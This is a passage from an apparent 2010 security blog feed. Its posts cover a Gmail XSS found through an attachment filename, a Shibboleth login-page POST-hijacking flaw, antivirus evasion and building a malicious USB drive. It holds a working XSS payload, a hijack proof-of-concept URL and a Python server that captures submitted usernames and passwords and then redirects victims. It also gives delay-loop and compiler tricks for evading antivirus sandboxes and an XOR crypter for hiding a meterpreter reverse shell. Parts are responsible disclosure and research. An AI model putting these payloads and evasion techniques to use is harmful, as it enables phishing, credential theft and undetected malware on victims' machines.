attack on the standard Gmail interface.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="proof-of-concept"&gt;
&lt;h2&gt;Proof of Concept&lt;/h2&gt;
&lt;p&gt;Send an email from the SMTP server of your choice with an attachment
named:&lt;/p&gt;
&lt;p&gt;&amp;quot;&amp;gt;&amp;lt;img src=&amp;quot;http://bit.ly/XcfTv&amp;quot;
onload=&amp;quot;alert(String.fromCharCode(88,83,83))&amp;quot;/&amp;gt;.txt&lt;/p&gt;
&lt;p&gt;Screenshot:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-2.png"&gt;&lt;img alt="Gmail XSS 1" src="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-2-300x174.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Now, at this point, I was a little incredulous. There's no way that
after about 10 minutes of work I had just found an XSS flaw this basic
in what, I believe, is the most used webmail interface in the world,
right? Well, as it turns out, it was not *quite* as bad as I had
originally thought. I opened Firefox to test the flaw, and was surprised
to find the filename was now perfectly sanitized. Upon testing in a
number of other browsers and OSs, it appeared that the flaw solely
affected Chrome on all platforms.&lt;/p&gt;
&lt;p&gt;Given that I'm in the middle of exams right now, I sadly didn't have
time to try to reverse the exact point of failure before the fix was
applied, but my shot-in-the-dark guess would be that Google rolled out a
new feature for testing in Chrome first before it moved to other
browsers, and somewhere in their changes a sanitization routine got
bypassed. However, this is sadly just a random guess, and Google did not
enlighten me as to the specific details. Sorry to disappoint, all.&lt;/p&gt;
&lt;p&gt;EDIT: I hate to leave questions unanswered; after all, I'm curious too.
Although I could be wrong, the flaw seems to stem from Google's addition
of a new &amp;quot;drag-files-to-the-desktop&amp;quot; feature a few months back. This
would explain why a.) only Chrome was vulnerable and b.) it was the
icons/links offering drag-and-drop that were affected, via an unsanitized
alt attribute. If anyone else knows better, though, I'd love to speak
with you.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;Regardless, given that &lt;a class="reference external" href="http://www.w3schools.com/browsers/browsers_stats.asp"&gt;an estimated 20% of Internet users use Google
Chrome&lt;/a&gt; and at least half of them use the webmail interface (I think
more, probably, but I'll be conservative), at least 10% of the Gmail
userbase was vulnerable to all the nasty things one can do via XSS,
simply by viewing an email with a maliciously crafted attachment.
Although my exploit simply added some lovely pictures of Rick Astley to
the email and popped up an alert dialog, it could just as easily have
stolen cookies (giving an attacker a chance to hijack the account
remotely), sent emails (think XSS worm), or read out emails and
contacts from the account, all largely hidden from the user. I promptly
notified Google of the problem, given the serious nature of the issue.&lt;/p&gt;
&lt;p&gt;I have to commend the Google Security Team for their blazingly fast
response to my disclosure. Although the screenshot demoing XSS in Gmail
probably encouraged a faster reaction, they replied within 15 minutes of
my initial email notifying me that they had read the disclosure and were
looking into the problem. Given that I notified them at 5 P.M. on a
Saturday afternoon, I was duly impressed. Within 24 hours, the flaw had
been patched, and soon after I received an email notifying me that a
temporary fix had been put into place. I had not even expected much of a
response until Monday, let alone a fix, so I was quite happy with their
reaction. Friendly, quick, and professional: the Google Security Team
should serve as a model for other organizations who are working on
handling disclosures by independent researchers effectively.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="random-other-blather"&gt;
&lt;h2&gt;Random Other Blather&lt;/h2&gt;
&lt;p&gt;I still have to wonder, though, how this flaw got through Google's
testing in the first place. As I stated earlier, it was a little
unnerving to me that I found an attack vector that quickly and easily,
given that I didn't do anything to find it that anyone should find
particularly clever. Clearly, my discovery was aided significantly by
blind luck, but my research this past week has certainly made me
think twice about ever using web-based interfaces to view my email.&lt;/p&gt;
&lt;p&gt;I am glad to see that Google is being very active and responsive
in closing security holes, though, and (great for me!) &lt;a class="reference external" href="http://www.google.com/corporate/halloffame.html"&gt;rewarding those
who report such flaws&lt;/a&gt; appropriately. I am hopeful that if
organizations begin to follow Google's lead and encourage independent
security research on their products, we might someday reach a point
where finding vulnerabilities of similar gravity is a matter of years of
research and development, rather than a few minutes of time and ~10
lines of Python.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="chrome"></category><category term="gmail"></category><category term="google chrome"></category><category term="google reward program"></category><category term="vulnerability"></category><category term="xss"></category></entry><entry><title>Shibboleth Example Login Page: POST Location Hijacking Vulnerability</title><link href="https://spareclockcycles.org/2010/12/09/shibboleth-post-location-hijacking-vulnerability.html" rel="alternate"></link><updated>2010-12-09T21:30:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-12-09:2010/12/09/shibboleth-post-location-hijacking-vulnerability.html</id><summary type="html">&lt;p&gt;EDIT: This flaw, according to the lead Shibboleth developer, was
&lt;a class="reference external" href="http://shibboleth.internet2.edu/secadv/secadv_20081103.txt"&gt;discovered and patched in late 2008&lt;/a&gt;. It seems that a number of
universities are still running outdated copies of the software, which is
what I found in my research. If you are running the latest version of
Shibboleth (2.2.0), you should be perfectly fine.&lt;/p&gt;
&lt;p&gt;Normally I'd be rather happy with myself for finding an XSS flaw in a
number of different login systems. However, sometimes it is just icing
on the cake. The interesting flaw here is a vulnerability that allows an
attacker to control the POST location of login forms in poor
implementations of a widely used login system called &lt;a class="reference external" href="http://shibboleth.internet2.edu/"&gt;Shibboleth&lt;/a&gt;,
thanks to a weakly protected example login page.&lt;/p&gt;
&lt;p&gt;Now first, to be clear, this certainly was not entirely the fault of the
Shibboleth developers. In fact, they probably knew the example wasn't
secure, and assumed that anyone implementing their own login system
would surely lock down the page. In addition, most of the
implementations are, in fact, secured. That said, the small minority
that failed to add proper sanitization of user input left their login
systems wide open to phishing attacks.&lt;/p&gt;
&lt;p&gt;So onto the vulnerability. Awhile back, my school switched over to
Google Apps for their email, and used Shibboleth (as many schools do)
for authentication. This wouldn't have been a problem, but someone
apparently didn't pay as much attention to possible security holes in the
demo application as they should have. And, as it turns out, some other
universities made the same mistake.&lt;/p&gt;
&lt;p&gt;I found the issue when I got curious one day about how the
authentication system worked. I started doing some poking around with
&lt;a class="reference external" href="https://addons.mozilla.org/en-US/firefox/addon/966/"&gt;TamperData&lt;/a&gt; to see where my browser was being redirected to during the
process. My attention was drawn to a parameter set on the school's login
page named &amp;quot;actionUrl&amp;quot;. Its default value, set during a redirect, was
&amp;quot;/idp/Authn/UserPassword&amp;quot;. Curious, I of course changed the parameter to
a remote url, &amp;quot;&lt;a class="reference external" href="http://google.com"&gt;http://google.com&lt;/a&gt;&amp;quot;. I refreshed, clicked submit, and sure
enough, the browser submitted the form via POST request to
Google.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;PoC:&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;https://myvulnlogin.university.edu/idp/login.jsp?actionUrl=http://google.com&lt;/span&gt;&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Clearly, not good. To make matters worse, it would also accept a POST
variable if the GET variable wasn't set, meaning I could create a
malicious link that points directly to the official login page, POSTs to
a webserver that I control, AND is entirely transparent to the user
(same website, valid SSL cert, no strange GET parameters). I'm not
entirely sure they could have made phishing any easier for an attacker.
However, exploiting this through POST requests can be quite difficult
through email based methods, so doing things this way requires a rather
different approach that I might make a post on later.&lt;/p&gt;
&lt;p&gt;For the time being, the GET PoC is more than sufficient to demonstrate
how bad the problem is. If you want to prove that it actually works, I
recommend using GNU Citizen's simple &lt;a class="reference external" href="http://lab.gnucitizen.org/projects/x-php-data-theft-script"&gt;x.php&lt;/a&gt; script, or (like I did)
rolling your own in Python. Finding vulnerable servers is a bit
annoying, as many of them have indexing disabled in their robots.txt,
and some vulnerable servers don't explicitly have the &amp;quot;actionUrl&amp;quot;
parameter in their URL, but searching &lt;a class="reference external" href="http://www.google.com/search?hl=en&amp;amp;noj=1&amp;amp;q=inurl:%22idp/login.jsp%22"&gt;inurl:&amp;quot;idp/login.jsp&amp;quot;&lt;/a&gt; still
brings up a few vulnerable pages. Chances are, though, that if you
attend or have recently attended a university, you have probably used
Shibboleth-based authentication at some point, and that the login page
is possibly vulnerable.&lt;/p&gt;
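&lt;p&gt;Rolling your own stand-in for x.php needs only the standard library:
record whatever form fields arrive, then bounce the victim onward so
nothing looks amiss. A minimal sketch (the port and redirect target are
placeholders; use this only against servers you own and control):&lt;/p&gt;

```python
# A Python stand-in for a credential-capturing POST endpoint. It records
# whatever form fields arrive, then 302-redirects the browser onward so
# the victim lands somewhere plausible.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

class CaptureHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = parse_qs(self.rfile.read(length).decode("utf-8", "replace"))
        print("captured:", fields)  # in practice, append to a log file
        self.send_response(302)     # bounce onward to look legitimate
        self.send_header("Location", "https://www.example.org/")
        self.end_headers()

    def log_message(self, *args):   # silence per-request stderr noise
        pass

# To run: HTTPServer(("", 8080), CaptureHandler).serve_forever()
```

&lt;p&gt;Point the hijacked actionUrl at this endpoint and the submitted username and password show up in the log, while the victim is redirected onward.&lt;/p&gt;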
&lt;p&gt;As stated before, these pages are also vulnerable to reflected XSS
attacks in the same parameter, but truthfully there's not too much
reason to use it when you can so easily capture a target's username and
password in an almost completely transparent manner, unless you'd just
rather hijack their session for some reason. Hopefully those who set up
these pages will fix these flaws before phishers and the like start
taking advantage of their quite serious shortcomings. As it stands, my
university still hasn't (over two and a half weeks after I notified
them), so I'm hoping this release will encourage them to fix their site,
as well as make people aware that there is a problem. More likely,
however, it will just encourage them to yell at me. So it goes.&lt;/p&gt;
</summary><category term="implementation fail"></category><category term="phishing"></category><category term="post hijacking"></category><category term="shibboleth"></category><category term="xss"></category></entry><entry><title>Avoiding AV Detection</title><link href="https://spareclockcycles.org/2010/11/27/avoiding-av-detection.html" rel="alternate"></link><updated>2010-11-27T05:07:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-11-27:2010/11/27/avoiding-av-detection.html</id><summary type="html">&lt;p&gt;As a follow-up to my post on the &lt;a class="reference external" href="https://spareclockcycles.org/2010/11/21/the-usb-stick-o-death/"&gt;USB Stick O' Death&lt;/a&gt;, I wanted to go a
little more in depth on the subject of AV evasion. Following my release
of (some of) my code for obfuscating my payload, it became apparent that
researchers at various antivirus companies read my blog (Oh hai derr
researchers! Great to have you with us! I can haz job?) and updated
their virus definitions to detect my malicious payload. To be perfectly
honest, I was hoping this would happen, as I figured it would be a
teachable moment on just how ineffective current approaches to virus
detection can be, give readers a real world look at how AV responds to
new threats, and provide one of the possible approaches an attacker
would take to evading AV software. My main goal in this research was to
see how much effort it would take to become undetectable again, and the
answer was 'virtually none'.&lt;/p&gt;
&lt;p&gt;In this post, I will first look at how I was able to evade detection by
many AV products simply by using a different compiler and by stripping
debugging symbols. Then, I will look at how I was able to defeat
Microsoft's (and many other AV products') detection mechanisms simply by
&amp;quot;waiting out&amp;quot; the timeout period of their simulations of my program's
execution. However, a quick note before we begin: I'm by no means an
expert on antivirus, as this exercise was partly to further my
understanding of how AV works, and these explanations and techniques are
based on my admittedly poor understanding of the technologies behind
them. If I mistakenly claim something that isn't true, or you can shed
light on some areas that I neglect, please comment. I would love to
learn from you.&lt;/p&gt;
&lt;div class="section" id="compiler-confusion"&gt;
&lt;h2&gt;Compiler Confusion&lt;/h2&gt;
&lt;p&gt;In my original post, I mentioned that I ended up using a copy of mingw64
from &lt;a class="reference external" href="https://launchpad.net/~tobydox/+archive/mingw"&gt;this PPA&lt;/a&gt; rather than from the standard Ubuntu repositories.
While you'd think that this detail wouldn't matter significantly, it
really ends up being almost everything. My malicious payload, when
compiled with that version of mingw64 rather than the default one, has
an enormously lower detection rate. Why is this?&lt;/p&gt;
&lt;p&gt;Well, apparently the two versions have enough differences in their
backend algorithms that the executable generated with Ubuntu's trips
some heuristic definitions, while one made with the PPA version doesn't.
The reason that Ubuntu's is being detected over the PPA is obvious:
attackers are more likely to have used the default one in the repos. In
addition, I actually saw three or four AV companies add detection for
the Ubuntu version of the executable, but have only seen one possible
additional detection of the PPA version (it might have been a fluke,
but I used it as my example anyway), which seems to indicate that
the researchers trying to replicate my executables were using the
default mingw64 as well. This confuses me a bit, as I've been uploading
my attempts to VirusTotal and linking to them, but hopefully they will
analyze them at some point.&lt;/p&gt;
&lt;p&gt;I haven't spent the time yet to figure out what is specifically causing
the problem for AV between the two versions of mingw64, and I imagine it
varies by AV product, but it serves to illustrate quite clearly the
large challenge facing AV companies of simply dealing with different
compilers and different optimization routines (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=50055a232f9ae68b6fadea719a9bc63efb752c49f78142610d5f5b2cb703ef7b-1290824043"&gt;payload detection rate
with Ubuntu's mingw64&lt;/a&gt; / &lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=2def01df66c757c7f3167cd1b2b55c34a4e2f090dc1296e3f171c697f59a4cca-1290740250"&gt;payload detection rate with PPA mingw64&lt;/a&gt;)&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="debugging-symbols-debacle"&gt;
&lt;h2&gt;Debugging Symbols Debacle&lt;/h2&gt;
&lt;p&gt;While the different compiler issue might be eye opening to some, I had
suspected that it would be an easy way to prevent detection, at least
early on in the lifecycle of a piece of malware. I was not expecting,
however, for debugging symbols to factor at all into the detection
issue. They have no impact on the actual behavior of the code itself,
only on code size and apparent file similarity by some metrics. However,
in my tests, simply stripping out the debugging symbols (strip
--strip-debug filename) managed to erase the detections I was getting
from two AV products, Ikarus and Emsisoft (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=b3cacc1ab49cf339d23dac78d6e940b78bff37779c5935e44e8472d86b752f11-1290826266"&gt;detection results&lt;/a&gt;). My
guess is that their scanning algorithms look for files that are a
certain percentage similar to previously seen malicious executables, and
then subject those to a sandboxed execution to try and gain a clean
memory image. Because the executables are (by their metrics) not very
similar, this sandboxed execution was not triggered, and the malicious
code that is revealed in memory during execution is not discovered.
However, this is certainly just a guess, and I would love for someone
more well versed in the finer points of AV operation to explain it to
me.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="timing-troubles"&gt;
&lt;h2&gt;Timing Troubles&lt;/h2&gt;
&lt;p&gt;Even with these two methods, however, I was still not completely
escaping AV detection. The closest I had come was by using the PPA
mingw64 version and stripping debugging symbols, which got me to my
original detection rate in which Microsoft was the only program
detecting my executable. It was clear at this point that Microsoft was
detecting my code by running it in a sandbox or simulator of some kind,
where it then was able to obtain a memory dump that revealed the
presence of my meterpreter payload. Being the perfectionist that I am
when it comes to these things, I still wanted 0% detection rather than
1/43. So how to do this?&lt;/p&gt;
&lt;p&gt;Assuming my understanding of the problem was correct, there were two
possible ways: avoid triggering the heuristic definition that marked it
for further scrutiny, or somehow defeat the sandbox itself.
Surprisingly, I ended up going with the latter. After a good number of
failed attempts to modify the code in such a way that it avoided the
heuristic trigger, I came up with a different idea: outlasting the
sandbox timeout. Because it made no sense to suppose that the sandbox
would allow the application to run indefinitely, I supposed that
Microsoft had some set limit of instructions or time that it would
simulate program execution for before killing it and taking a memory
dump. As it turns out, this assumption proved correct, and that timeout
period wasn't very long at all. To test my theory, I created two
slightly modified versions of my original, in which I just inserted two
loops into my decryption loop. I could have used anything that simply
chewed up CPU cycles, so this implementation choice is arbitrary and
intentionally ridiculous. The configurations (which can be inserted into
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/usod_v0.01.tar.gz"&gt;my original hide_payload.py script&lt;/a&gt;) are below.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Short loops:`` pre_loop = &amp;quot;int j, k;n&amp;quot; pre_enc = &amp;quot;for(j=0;j&amp;lt;2;j++){for(k=0;k&amp;lt;2;k++){&amp;quot; enc = &amp;quot;tmp[i]=sc[i]^key;n&amp;quot; post_enc = &amp;quot;}}n&amp;quot; post_loop = &amp;quot;//do nothingn&amp;quot; post_func = &amp;quot;//do nothingn&amp;quot;``&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Long loops: `` pre_loop = &amp;quot;int j, k;n&amp;quot; pre_enc = &amp;quot;for(j=0;j&amp;lt;500;j++){for(k=0;k&amp;lt;100;k++){&amp;quot; enc = &amp;quot;tmp[i]=sc[i]^key;n&amp;quot; post_enc = &amp;quot;}}n&amp;quot; post_loop = &amp;quot;//do nothingn&amp;quot; post_func = &amp;quot;//do nothingn&amp;quot;``&lt;/div&gt;
&lt;/div&gt;
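&lt;p&gt;The inferred sandbox behavior can be modeled in a few lines of Python.
Everything below is invented for illustration, including the step budget;
it is a toy model of the timeout hypothesis, not Microsoft's actual
engine:&lt;/p&gt;

```python
# Toy model of the timeout hypothesis. The "sandbox" executes at most
# step_budget inner-loop iterations before taking its memory dump; the
# budget (1000) and loop counts are invented for illustration only.
def emulate(encoded, key, delay_iters, step_budget=1000):
    buf = bytearray(len(encoded))
    steps = 0
    for i, b in enumerate(encoded):
        for _ in range(delay_iters):   # stand-in for the inserted j/k loops
            steps += 1
            if steps == step_budget:   # sandbox gives up: dump memory now
                return bytes(buf)
        buf[i] = b ^ key               # one byte of the payload decoded
    return bytes(buf)                  # ran to completion: payload in memory

payload = b"meterpreter"
key = 0x41
encoded = bytes(c ^ key for c in payload)

short = emulate(encoded, key, delay_iters=4)    # finishes inside the budget
long_ = emulate(encoded, key, delay_iters=500)  # the budget expires first
```

&lt;p&gt;With short loops the decode completes and the payload sits in the memory dump; with long loops the budget expires first and the dump contains mostly still-encrypted bytes, mirroring the two VirusTotal results below.&lt;/p&gt;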
&lt;p&gt;As you can see by these detection rates (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=442563fe8a1e23cdafbb701f42c68a87cb5134079971f2580dc3852c3f89a504-1290843756"&gt;short loop detection rate&lt;/a&gt;
/ &lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=89ecc6efc6a8837d3a23fcfa812376f8101190ff60018e4da1846c18f2f3edfc-1290842495"&gt;long loop detection rate&lt;/a&gt;), it is clear that Microsoft's AV is
quitting the program execution before the meterpreter payload is fully
decrypted, preventing detection. The short loop is detected, while the
long loop is not. A look at the code in Ollydbg also shows that the only
difference between the two generated executables is the number of loop
iterations.&lt;/p&gt;
&lt;p&gt;As it turns out, this approach is entirely feasible as a method of
avoiding detection: the long loops take less than a second to finish in
my test VM, a negligible delay for the added invisibility. In addition,
Microsoft is not the only AV that can be defeated via this technique. It
appears as though most of the AVs were detecting my payload via similar
techniques, and that most proved similarly weak (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=6fce88ff50fa3bfff259d3471e9c9d59f9191272824543c658f8a065622eb8a9-1290853350"&gt;improved Ubuntu
mingw64 version&lt;/a&gt;). These products include BitDefender, F-Secure, GData,
and nProtect. However, these are certainly not the only ones affected,
and in fact they should be commended for detecting my executable in the first
place. Oddly enough, a product called VBA32 began detecting a virus
called &amp;quot;BScope.Jackz.e&amp;quot; after I added these loops, which makes me
curious as to whether or not someone is already exploiting this
weakness.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="convincing-conclusion"&gt;
&lt;h2&gt;Convincing Conclusion&lt;/h2&gt;
&lt;p&gt;To begin my carefully crafted conclusion to this alliterative analysis
of antivirus, I want to first note that this post is certainly not meant
to disrespect the work that AV companies do: detection of malware is
difficult business, and the attacker certainly has a significant
advantage. My malware is certainly not anywhere near the hardest threat
that AV has to deal with, either. Indeed, this probably partly explains
why it was so easy to bypass detections: the adults had better things to
do than write definitions specifically for my crappy toy crypter. I
seriously doubt that the writers of Conficker could resort to such
simple methods to avoid detection. That said, it seems to me that trying
to implement detection based on live behavioral techniques could
significantly improve AV effectiveness, much more than toiling
hopelessly away in research labs, trying to complete the Sisyphean task
of writing definitions that catch every known or slightly modified piece
of malware. At some point, if not already, this will become entirely
impossible, and a new solution will need to be devised.&lt;/p&gt;
&lt;p&gt;Of course, in this discussion, we must also remember that AV is
essentially the very last line of defense between an attacker and code
execution, and if one manages to get to this point, our system
protections have already failed miserably. To me, AV is analogous to the
TSA: expensive, intrusive, and not incredibly effective for the effort
involved. This is not to say that AV is not helpful in preventing
attacks; both AV and the TSA are decent barriers that make it more
difficult to exploit common attack vectors. However, neither are the
be-all-end-all of security in their respective fields, and, with
effective security policies in place, they should only be present as a
contingency plan of sorts, to become important in preventing attacks
only if all else fails. I hope this small test case has illustrated the
degree to which a system's overall security posture (disabling
AutoRun/AutoPlay, disallowing USB drives, keeping software up-to-date,
etc) is much more important than simply having up to date antivirus
software installed on a given system, and that we need to continue to
research new ways to improve AV detection methods so that it might not
need to rely solely on reactive virus definitions, but rather work
towards a system aided by proactive detection techniques.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="antivirus"></category><category term="antivirus evasion"></category><category term="usb"></category></entry><entry><title>The USB Stick O' Death</title><link href="https://spareclockcycles.org/2010/11/21/the-usb-stick-o-death.html" rel="alternate"></link><updated>2010-11-21T21:07:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-11-21:2010/11/21/the-usb-stick-o-death.html</id><summary type="html">&lt;p&gt;Alright, so maybe this title is a bit hyperbolic and misleading, but I
think that this post deserves an exciting name. And yes, it's been a
long time since I posted, but screw it, I'll post when I get around to
it.&lt;/p&gt;
&lt;p&gt;I've recently been researching and experimenting with USB malware, and I
wanted to take a shot at developing my own malicious USB stick. Now, I'm
aware that &lt;a class="reference external" href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)"&gt;SET&lt;/a&gt; provides a simple way to quickly backdoor a USB
drive, but their implementation is a little lacking in a lot of areas
(not to detract from the application, it is a great tool). The
executable it creates is a simple meterpreter backdoor, which, though
not perfectly detected by any means, still has a higher detection rate
than I would like. In addition, it only exploits a single attack vector,
abusing AutoPlay. My goals were a 0% detection rate of the payload by
antivirus, 32 and 64 bit support, and for the drive to utilize as many
technical and social engineering vectors as possible, so it was clear I
was going to have to do some work myself. By all accounts, I believe I
have largely achieved these goals, and created a very effective, and
largely undetected, malicious USB drive. A side note: if you are
interested in USB malware, the &lt;a class="reference external" href="http://www.offensive-security.com/metasploit-unleashed/SET_Teensy_USB_HID_Attack"&gt;Teensy HID vector&lt;/a&gt;, as far as I can
tell, is really the next generation of USB attacks. Sadly, however, I do
not have one of these devices yet to play around with, so I decided to
focus on getting the most out of the lowly USB drives I had lying
around.&lt;/p&gt;
&lt;p&gt;I do want to start by saying that this post is not meant to be a &amp;quot;how
to&amp;quot; guide on how to create a malicious USB drive, but rather, a
documentation of the thought process an attacker might go through to
create their own, as well as an illustration of just how large of a
security risk the lowly USB drive still poses. There are literally
thousands of different design choices that could be made at every point
during this process, from social engineering strategies, to what
payloads to include, to how to evade antivirus. The methods I ended up
choosing are, admittedly, crude and unrefined, but they achieved my
intended goals, and gave me, surprisingly quickly, an effective and
largely undetected malicious USB drive. Readers interested in creating
their own drives should keep this in mind while reading, and are
definitely encouraged to take their own approach to solving the problem.
As always, let me know if you find something interesting or if you try
something different, I'd be very interested in hearing what you did.&lt;/p&gt;
&lt;div class="section" id="software-and-supplies"&gt;
&lt;h2&gt;Software and Supplies&lt;/h2&gt;
&lt;p&gt;First, of course, you will need to get the necessary software and
supplies. I did all of this with an Ubuntu installation and a Windows
VM, so it will be documented as such. If you have a different setup, you
will need to alter the process accordingly. In addition to these, I had
a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/U3"&gt;U3 enabled USB drive&lt;/a&gt;, a recent copy of the &lt;a class="reference external" href="http://www.metasploit.com/"&gt;Metasploit framework&lt;/a&gt;,
a copy of the &lt;a class="reference external" href="http://www.hak5.org/packages/files/Universal_Customizer.zip"&gt;U3 Customizer&lt;/a&gt;, a working installation of the &lt;a class="reference external" href="http://sourceforge.net/projects/mingw-w64/"&gt;mingw64
compiler&lt;/a&gt;, a really obscure application called &lt;a class="reference external" href="http://www.abyssmedia.com/quickbfc/"&gt;Quick Batch File
Compiler&lt;/a&gt;, and &lt;a class="reference external" href="http://www.ollydbg.de/"&gt;Ollydbg&lt;/a&gt; (or your debugger of choice). A side note:
for mingw64 on Ubuntu, I actually ended up using &lt;a class="reference external" href="https://launchpad.net/~tobydox/+archive/mingw"&gt;this excellent PPA&lt;/a&gt;
to get things working; there seems to be a packaging bug in the
repositories right now that prevents cross-compilation of 64 bit
executables. You probably won't end up needing this, but it's nice to
have in case you do. Finally, you can grab &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/usod_v0.01.tar.gz"&gt;a tarball of some of the
code I wrote and my autorun configurations&lt;/a&gt;, if you want to follow
along.&lt;/p&gt;
&lt;p&gt;Once you have these things, you should be all set to get started.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="writing-a-simple-xor-crypter"&gt;
&lt;h2&gt;Writing a Simple XOR Crypter&lt;/h2&gt;
&lt;p&gt;The first problem I had to solve was how to decrease the detection rate
of my payload. As my first payload, I decided on a standard reverse_tcp
meterpreter shell. From this, I could do whatever post exploitation I
wanted, including remotely managing the victim's computer safely from a
remote location. Many tools, such as the &lt;a class="reference external" href="http://www.hak5.org/w/index.php/USB_Switchblade"&gt;U3 switchblade&lt;/a&gt;, run a bunch
of utilities that collect information on the local machine (passwords, IP,
patches, etc.) and store it back to the USB drive. However, as I was
intending to use this drive in a USB drop style attack, it didn't make
much sense to try to gather and save a bunch of information that I might
not be able to recover later. As long as I have a shell connecting back
to me, I can make any of these attacks run automatically with the
AutoRunScript setting anyway.&lt;/p&gt;
&lt;p&gt;However, even just with the reverse_tcp shell running, antivirus tends
to start throwing up red flags. The meterpreter shell alone, even when
embedded in another executable using Metasploit's handy template option,
has &lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=57a61f688a7be2bb958d6e1b49ec03658b644d40f875723f674b4d51e7b2e963-1290383155"&gt;a little less than a 40% detection rate&lt;/a&gt;, which is clearly unacceptable
for my purposes. It was pretty obvious that I was going to have to write
something to obfuscate my payload.&lt;/p&gt;
&lt;p&gt;What surprised me during all of this was how ridiculously easy it is to
do just that. About 60 lines of Python (I know, way too many) and 20
lines of C was all it took to take my detection rate from 40% to 1% (&lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=969a1589ff1522dd661fe9bee8ba81e4272c54100dc0883aba2378edf75c6a26-1290383512"&gt;32
bit version&lt;/a&gt; / &lt;a class="reference external" href="http://www.virustotal.com/file-scan/report.html?id=6bcc45931477218064e8e0e1da1d2c43e4bcbc9cf386c28dc08958ecb7ae0507-1290383590"&gt;64 bit version&lt;/a&gt;). The Python code is largely just there to
automate things, but it also made the XOR crypting easier and allowed me
to more easily embed arbitrary executables in my code (which is useful
for embedding other, non-Metasploit payloads). It should also help me
extend and modify my code when the backdoor starts getting detected (I
don't give it long; it's basically the simplest obfuscation ever). In
the tarball you grabbed earlier, I included one of the earlier versions
of my code (wouldn't want to spoil all the development fun for you all,
would I? :P). That version will use Metasploit to generate a payload,
create a simple C file that wraps it in a simple &lt;a class="reference external" href="http://en.wikipedia.org/wiki/XOR_cipher"&gt;XOR crypter&lt;/a&gt;, and
then compiles it into 32 bit (and 64 bit, if desired) binaries using
mingw64. This alone should be more than you need to get started making
your own payloads.&lt;/p&gt;
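&lt;p&gt;For the curious, the core of such a crypter really is tiny. Here is a minimal sketch in Python of the idea (the names, key, and placeholder bytes are illustrative, not the code from the tarball): XOR the raw payload with a key, then emit it as a C array for the decrypt stub to decode at runtime.&lt;/p&gt;

```python
# Minimal single-byte XOR crypter sketch. KEY, function names, and the
# placeholder bytes are illustrative; see the tarball for the real script.
KEY = 0x41  # any non-zero byte

def xor_crypt(data, key):
    # XOR is its own inverse, so the same routine encrypts and decrypts.
    return bytes(b ^ key for b in data)

def to_c_array(data, name="payload"):
    # Emit the crypted bytes as a C array for the decrypt stub to embed.
    body = ", ".join("0x{:02x}".format(b) for b in data)
    return "unsigned char {}[] = {{{}}};".format(name, body)

raw = bytes([0xfc, 0xe8, 0x89, 0x00])  # placeholder bytes, NOT real shellcode
enc = xor_crypt(raw, KEY)
assert xor_crypt(enc, KEY) == raw      # round-trips cleanly
print(to_c_array(enc))
```

&lt;p&gt;The generated C file then only needs to carry the array plus a short loop that XORs it back before executing it.&lt;/p&gt;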
&lt;p&gt;I'm still struggling to understand how low the detection rates got with
such a simple technique, as it was essentially the most basic XOR crypter one
could write. Even factoring in that it was being cross-compiled with
mingw64 rather than natively compiled in Visual Studio or the like
(which can throw off some signatures), it still shouldn't have ruined
detection rates that badly. I guess I just expect more from antivirus
companies than they actually deliver. As you can see, only a single
detection is still occurring in my tests: Microsoft's definitions catch
my 32-bit payload. However, I suppose 1/86 isn't bad, and I'll be
looking into getting that to 0. Any suggestions are welcome.&lt;/p&gt;
&lt;p&gt;EDIT: I did a follow-up to this post on &lt;a class="reference external" href="https://spareclockcycles.org/2010/11/27/avoiding-av-detection/"&gt;avoiding AV detection&lt;/a&gt;, in
which I solved this detection issue by simply wasting some processor
time prior to decrypting the payload. Who knew bypassing AV would be as
easy as adding a lowly for loop? :P&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="bit-support"&gt;
&lt;h2&gt;64 Bit Support&lt;/h2&gt;
&lt;p&gt;The next problem to tackle was how to get the payload to work on both 32
and 64 bit systems. And actually, as it turns out, this isn't a problem
at all. Although I researched how to generate 64 bit executables, and
they hide remarkably well, the 32 bit payload works just fine in 64 bit
Windows. I was a bit worried that Metasploit wouldn't be able to migrate
to 64 bit processes, but it seems that they added that feature awhile
back. So hooray! On to the next step.&lt;/p&gt;
&lt;p&gt;If, for some reason, you do want a separate 64-bit payload,
